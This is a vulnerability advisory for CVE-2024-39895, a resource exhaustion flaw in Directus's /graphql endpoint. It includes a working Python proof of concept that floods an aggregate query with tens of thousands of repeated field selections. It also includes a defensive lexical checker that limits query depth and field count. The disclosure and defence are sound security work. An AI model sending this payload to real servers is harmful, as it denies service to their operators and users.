Resource Exhaustion Affecting directus package, versions <10.12.0
- Snyk ID SNYK-JS-DIRECTUS-7430908
- published 9 Jul 2024
- disclosed 8 Jul 2024
- credit asantof
Introduced: 8 Jul 2024
CVE-2024-39895
How to fix?
Upgrade directus to version 10.12.0 or higher.
Overview
directus is a real-time API and App dashboard for managing SQL database content.
Affected versions of this package are vulnerable to Resource Exhaustion through the /graphql endpoint. An attacker can cause the server to perform redundant computations and consume excessive resources.
PoC
GitHub @asantof
```python
import requests

# CHANGE THESE VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql'
auth_token = ''
query_name = 'query_XXXXX'
collection_name = ''

headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {auth_token}',
}

# 200 repeated 'id' selections inside one 'max' block, and that block repeated 200 times
id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + ' } '
full_payload = max_payload * 200

data = {
    'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'
}
print(data)

response = requests.post(url, headers=headers, json=data)
print(response.json())
```
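The PoC above works by repeating the same field selections thousands of times inside a shallow document, so a nesting-depth limit alone does not catch it. The following is an added defensive illustration, not Directus code and not the fix shipped in 10.12.0: a lightweight lexical pass over a GraphQL document that counts selection-set depth and total field selections, suitable as a pre-flight check in front of a /graphql endpoint. The thresholds `MAX_DEPTH` and `MAX_FIELDS`, the function names, and the sample queries are all assumptions constructed for this example.

```python
import re

# Assumed thresholds (not Directus defaults); tune for the deployment.
MAX_DEPTH = 10      # deepest allowed nesting of selection sets
MAX_FIELDS = 500    # most field selections allowed in one document

# Lexical tokens: block strings, strings, comments, the punctuators we track,
# names, and everything else (numbers, $variables, @directives, ...spreads).
_TOKEN = re.compile(
    r'"""(?:.*?)"""|"(?:\\.|[^"\\])*"|#[^\n]*|[{}():]|[_A-Za-z][_0-9A-Za-z]*|[^\s{}():"#]+',
    re.DOTALL,
)
_NAME = re.compile(r'[_A-Za-z][_0-9A-Za-z]*')


def analyze_query(query: str) -> dict:
    """Return the maximum selection-set depth and the number of field selections.

    Braces inside argument lists (input objects such as Directus filters) are
    ignored, and an alias plus its field ('q: items') is counted as one selection.
    """
    depth = max_depth = fields = paren = 0
    after_colon = False
    for tok in (m.group(0) for m in _TOKEN.finditer(query)):
        if tok[0] in '#"':
            continue                      # comments and string literals
        if tok == '(':
            paren += 1
        elif tok == ')':
            paren -= 1
        elif paren:
            continue                      # inside arguments: nothing here is a field
        elif tok == '{':
            depth += 1
            max_depth = max(max_depth, depth)
        elif tok == '}':
            depth -= 1
        elif tok == ':':
            after_colon = True
            continue
        elif depth and not after_colon and _NAME.fullmatch(tok):
            fields += 1                   # a field selection inside a selection set
        after_colon = False
    return {'max_depth': max_depth, 'fields': fields}


def check_query(query: str) -> tuple:
    """Return (accepted, reason) for a document against the assumed limits."""
    stats = analyze_query(query)
    if stats['max_depth'] > MAX_DEPTH:
        return False, f"selection depth {stats['max_depth']} exceeds {MAX_DEPTH}"
    if stats['fields'] > MAX_FIELDS:
        return False, f"{stats['fields']} field selections exceed {MAX_FIELDS}"
    return True, 'ok'


# Constructed sample: the shape of the advisory's PoC, 200 'max' blocks of 200 'id' each.
ABUSIVE_QUERY = 'query { q: items_aggregated { ' + ('max { ' + 'id ' * 200 + '} ') * 200 + '} }'

# Constructed benign query with variables, arguments and an input-object filter.
BENIGN_QUERY = '''
query ($limit: Int) {
  articles(limit: $limit, filter: { status: { _eq: "published" } }) {
    id
    title
    author { name }
  }
}
'''

if __name__ == '__main__':
    for name, q in (('benign', BENIGN_QUERY), ('abusive', ABUSIVE_QUERY)):
        print(name, analyze_query(q), check_query(q))
```

Running the block shows the PoC-shaped document reaching only depth 3 (it would pass a depth-only limit) while carrying over 40,000 field selections, which is what the field-count check rejects. A production filter would normally use a real GraphQL parser and a cost model rather than this lexical approximation, but the two measures it takes, depth and total selections, are the ones that matter for this class of redundant-computation abuse.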